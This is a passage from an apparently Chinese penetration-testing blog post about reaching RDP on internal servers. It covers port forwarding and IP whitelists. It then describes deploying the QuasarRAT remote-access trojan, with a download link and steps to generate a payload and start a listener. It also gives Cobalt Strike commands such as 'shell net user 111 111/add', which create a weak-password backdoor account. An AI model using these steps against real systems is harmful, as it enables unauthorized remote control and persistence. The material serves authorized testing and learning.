<h4 id="服务器网络环境处于内网："><a href="#服务器网络环境处于内网：" class="headerlink" title="服务器网络环境处于内网："></a>服务器网络环境处于内网：</h4><p>解决办法：端口转发</p>
<h4 id="防护验证规则-IP-或计算机名："><a href="#防护验证规则-IP-或计算机名：" class="headerlink" title="防护验证规则/IP 或计算机名："></a>防护验证规则/IP 或计算机名：</h4><p>解决办法：找 IP/计算机名白名单。如果真遇上这种情况又找不着白名单的话，在 3389 这一块算是交代了，可以换一种思路，上远控：<br><a href="https://github.com/quasar/Quasar/releases" target="_blank" rel="noopener"><strong>QuasarRAT 远控</strong></a><strong><a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725366079-3f520eeb-811a-4114-a27e-426c2c156e79.zip?_lake_card=%7B%22uid%22%3A%221596610107559-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725366079-3f520eeb-811a-4114-a27e-426c2c156e79.zip%22%2C%22name%22%3A%22Quasar.zip%22%2C%22size%22%3A625918%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22ysDLg%22%2C%22card%22%3A%22file%22%7D">Quasar.zip</a></strong><br><strong>1、生成 payload</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596610350819-1360ceed-cdbf-4c28-aa08-9b4938983618.png#align=left&display=inline&height=703&margin=%5Bobject%20Object%5D&name=image.png&originHeight=703&originWidth=835&size=98614&status=done&style=none&width=835" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、开启监听</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596610363202-583ab935-4d08-48ac-8ff1-c2f74d90a3ee.png#align=left&display=inline&height=677&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=733&size=135271&status=done&style=none&width=733" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p><strong>需要靶机支持 .NET Framework 4.0 环境，且使用管理员权限运行 payload。</strong></p>
<h1 id="注意："><a href="#注意：" class="headerlink" title="注意："></a>注意：</h1><p><strong>cobalt strike 添加账户需要使用 shell net user 111 111/add</strong><br><strong>不能使用 net user 111 111/add</strong><br><strong>否则出错</strong><br>原因：Beacon 自带 <code>net</code> 命令（其中 <code>net user</code> 只用于枚举用户），不加 <code>shell</code> 前缀时命令会被 Beacon 内置实现处理而不是交给 cmd.exe，因此不支持 <code>/add</code>。<code>shell</code> 会拉起 cmd.exe 执行；如不想留下 cmd.exe 子进程，可用 <code>run net user 111 111 /add</code> 直接执行 net.exe。新建的弱口令账户本身就是一个后门，测试结束后务必删除。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604853921-977a6384-5251-46a9-8977-a9c08820f9be.png#align=left&display=inline&height=103&margin=%5Bobject%20Object%5D&name=image.png&originHeight=206&originWidth=519&size=13475&status=done&style=none&width=259.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="学习文档"><a href="#学习文档" class="headerlink" title="学习文档"></a>学习文档</h1><p><a href="https://xz.aliyun.com/t/8054" target="_blank" rel="noopener">https://xz.aliyun.com/t/8054</a></p>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-08-14T15:17:20.626Z" itemprop="dateUpdated">2020-08-14 23:17:20</time>
</span><br>


        
        
    </div>
    
</blockquote>

        



    </div>

    



    




















</article>




</div>

        <footer class="footer">
    <div class="top">
        


        <p>
            
            <span>This blog is licensed under a <a rel="license noopener" href="https://creativecommons.org/licenses/by/4.0/" target="_blank">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
</footer>

    </main>





















</body>
</html>
